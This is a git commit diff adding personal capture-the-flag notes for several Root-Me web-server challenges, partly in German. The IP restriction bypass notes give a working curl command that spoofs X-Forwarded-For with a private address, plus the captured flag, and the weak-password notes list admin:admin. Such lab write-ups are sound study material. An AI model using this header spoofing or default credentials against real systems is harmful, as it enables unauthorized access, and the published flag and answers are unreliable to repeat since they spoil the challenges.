feat: app system challenges

Signed-off-by: Tuan-Dat Tran <tuan-dat.tran@dextradata.com>

web-server/backup-file/notes.org

@@ -0,0 +1,4 @@
+* Backup file
+
+Challenge: https://www.root-me.org/de/Herausforderungen/Web-Server/Backup-file
+http://challenge01.root-me.org/web-serveur/ch11/

web-server/html-source-code/notes.org

@@ -1,6 +1,8 @@
 
 * HTML - Source code
 
+Challenge: https://www.root-me.org/de/Herausforderungen/Web-Server/HTML
+
 Suchen Sie nicht zu weit weg
 
 [[./index.html]]

web-server/http-ip-restriction-bypass/index.html

@@ -0,0 +1,27 @@
+<!DOCTYPE html>
+<html>
+<head>
+	<title>Secured Intranet</title>
+</head>
+<body><link rel='stylesheet' property='stylesheet' id='s' type='text/css' href='/template/s.css' media='all' /><iframe id='iframe' src='https://www.root-me.org/?page=internal_header'></iframe>
+			<span>Your IP <strong>::ffff:94.135.236.24</strong> do not belong to the LAN.</span>
+		<h1>Intranet</h1>
+		<form method="post">
+			<p>
+				<label for="login">Login:</label>
+				<input type="text" name="login">
+			</p>
+			<p>
+				<label for="pass">Password:</label>
+				<input type="text" name="mdp">
+			</p>
+			<p>
+				<input type="submit" value="login">
+			</p>
+			<p>
+				<small>You should authenticate because you're not on the LAN.</small>
+			</p>
+		</form>
+	</body>
+</html>
+

web-server/http-ip-restriction-bypass/notes.org

@@ -0,0 +1,40 @@
+* HTTP - IP restriction bypass
+
+Challenge: https://www.root-me.org/de/Herausforderungen/Web-Server/HTTP-IP-restriction-bypass
+Description: Nur lokale Benutzer können auf die Seite zugreifen
+
+Aufgabe
+#+begin_quote
+Liebe Kollegen,
+
+Wir verwalten jetzt die Verbindungen zum Intranet über private IP-Adressen, so dass es nicht mehr notwendig ist, sich mit einem Benutzernamen/Passwort anzumelden, wenn Sie bereits mit dem internen Firmennetz verbunden sind.
+
+Herzliche Grüße,
+
+Der Netzverwalter
+#+end_quote
+
+-----
+
+Challenge Website: http://challenge01.root-me.org/web-serveur/ch68/
+
+Analyse
+- Initial request:
+  - `curl -i "http://challenge01.root-me.org/web-serveur/ch68/"`
+  - Server responds with login page and message: `Your IP ::ffff:<public-ip> do not belong to the LAN.`
+- Header tests (IP spoofing candidates):
+  - `X-Forwarded-For: 127.0.0.1` -> IP shown as `127.0.0.1`, still rejected.
+  - `Client-IP: 127.0.0.1` -> IP shown as `127.0.0.1`, still rejected.
+  - `X-Client-IP: 127.0.0.1` -> ignored by app.
+- Working bypass:
+  - `X-Forwarded-For: 192.168.1.10` (also works with `10.0.0.42`)
+  - `Client-IP: 192.168.1.10` also works.
+  - App trusts spoofable headers and only checks if IP is in private/LAN ranges.
+
+Exploit command
+#+begin_src bash
+curl -i -H "X-Forwarded-For: 192.168.1.10" "http://challenge01.root-me.org/web-serveur/ch68/"
+#+end_src
+
+Flag
+- `Ip_$po0Fing`

web-server/weak-password/notes.org

@@ -0,0 +1,5 @@
+* Weak Password
+
+Challenge: https://www.root-me.org/de/Herausforderungen/Web-Server/Weak-password
+
+admin:admin